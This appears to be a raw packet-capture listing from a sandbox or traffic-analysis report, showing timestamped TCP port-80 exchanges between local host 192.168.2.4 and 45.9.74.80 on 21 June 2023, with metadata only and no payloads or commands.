                                                                                                  Jun 21, 2023 20:23:59.162286043 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162322998 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162348986 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162385941 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162420988 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162426949 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.162426949 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.162426949 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.162457943 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162467003 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.162497997 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162534952 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162564039 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.162570953 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162610054 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162615061 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.162646055 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162652016 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.162683964 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162728071 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162765026 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162770987 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.162770987 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.162801981 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162837029 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.162838936 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162873983 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.162878990 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162919044 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162940979 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.162955046 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.162992954 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.163011074 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.163029909 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.163067102 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.163105011 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.163114071 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.163114071 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.163114071 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.163141966 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.163170099 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.163180113 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.163218975 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.163223982 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.163255930 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.163256884 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.163295031 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.163332939 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.163343906 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.163343906 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.163369894 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.163394928 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.163408995 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.163446903 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.163459063 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.163528919 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.163645983 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.175997019 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.176055908 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.176083088 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.176109076 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.176115036 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.176136017 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.176193953 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.176193953 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.176193953 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.176235914 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.176373005 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.176539898 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.201354027 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.201627016 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.201736927 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.201785088 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.201814890 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.201814890 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.201814890 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.201853991 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.201901913 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.201947927 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.201987028 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.201996088 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202047110 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202094078 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202141047 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202171087 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.202171087 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.202188969 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202238083 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202280998 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.202280998 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.202286959 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202336073 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202382088 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202429056 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202476978 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202478886 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.202478886 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.202527046 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202574968 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202585936 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.202621937 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202667952 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202671051 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.202716112 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202761889 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202773094 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.202809095 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202855110 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202867985 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.202903986 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202950001 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.202994108 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.202997923 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203046083 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203049898 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.203094006 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203140020 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203186035 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203233004 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203233957 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.203234911 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.203279972 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203327894 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203336000 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.203375101 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203421116 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203468084 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203471899 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.203517914 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203566074 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203588963 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.203609943 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.203613997 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203663111 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203711987 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203762054 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203763008 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.203763008 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.203809977 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203860998 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203908920 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.203952074 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.203952074 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.203955889 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204009056 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204055071 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.204055071 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204103947 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204150915 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204152107 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.204196930 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204243898 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204301119 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.204309940 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204381943 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204427004 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204472065 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204476118 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.204477072 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.204516888 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204565048 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204581022 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.204612017 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204658985 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204660892 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.204705954 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204752922 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204801083 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204849958 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204898119 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204946995 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.204996109 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205059052 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205259085 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.205259085 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.205259085 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.205638885 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205703974 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205727100 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205748081 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205769062 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205790043 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205811024 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205832958 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205854893 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205857038 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.205857992 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.205857992 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.205857992 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.205874920 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205899954 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205900908 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.205921888 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205943108 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205964088 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.205985069 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206001043 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.206001043 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.206006050 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206027985 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206048965 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206048012 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.206069946 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206093073 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.206094027 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206116915 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206130028 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.206139088 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206160069 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206182003 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206202030 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206223965 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206244946 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206265926 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206285000 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.206285954 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206285000 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.206285000 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.206285000 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.206309080 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206330061 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206350088 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206370115 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206389904 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206412077 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.206469059 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.206469059 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.206470013 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.208442926 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.208442926 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.231584072 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.231651068 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.231715918 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.231731892 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.231760025 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.231791019 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.231827974 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.231834888 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.231864929 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.231894970 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.231918097 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.231924057 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.231954098 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.231981993 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.231986046 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232014894 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232044935 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232074022 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232103109 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232112885 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232112885 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232132912 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232155085 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232163906 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232193947 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232208967 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232225895 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232255936 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232300997 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232330084 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232331038 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232330084 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232361078 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232393026 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232410908 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232423067 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232455015 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232486963 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232516050 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232544899 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232574940 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232585907 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232585907 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232605934 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232635021 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232636929 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232666969 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232697010 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232728004 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232733965 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232733965 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232758045 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232788086 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232817888 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232830048 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232830048 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232846975 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232877970 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232908010 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232937098 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232966900 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.232969999 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232969999 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.232996941 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233026981 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233057022 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233062983 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.233062983 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.233087063 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233107090 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.233118057 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233150005 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233179092 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233210087 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233234882 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.233236074 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.233238935 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233269930 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233287096 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.233299017 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233329058 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233350039 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.233357906 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233391047 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233421087 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233436108 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.233454943 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.233480930 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.233484983 CEST804970445.9.74.80192.168.2.4
